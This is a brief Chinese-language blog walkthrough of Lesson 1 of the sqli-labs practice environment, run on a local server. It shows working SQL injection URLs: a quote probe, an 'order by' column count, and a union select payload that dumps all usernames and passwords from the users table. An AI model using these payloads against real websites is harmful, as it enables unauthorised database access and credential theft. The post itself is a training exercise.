没有好的排版,大家凑乎看吧。
最近装了好了sqli labs,几经周折啊,mac上一开始装了,但mac自带的php版本不行,太高,mysql扩展已经没了。重新去下了php,但是对这个不熟悉,mysql扩展还是没有,虽然我包含了库。最后去win10下安装的,最后终于是搞定了。今天说一下lesson one的思路。界面如下:
1. 先看了源代码,没什么卵用,就不看了。
2.上面写的是把id当参数输入,试了一下,url: http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=1
显示除了用户名和密码。尝试在修改参数看是否id存在注入,url:http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=1'
显示报错,说明这里存在注入。
接下来就是用order by 判断输出个数,经测试为3个,url:http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=1' order by 3%23,4个会提示没有第4列。
然后就是union select了,查数据库,查表名,查列名,具体不说了,贴一个最后的url:
http://192.168.0.108/www/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(distinct(username)),group_concat(distinct(password)) from users%23
最后显示所有的用户及密码,如下:
最后这个联系也就结束了。
有任何疑问,请留言,共同进步,谢谢。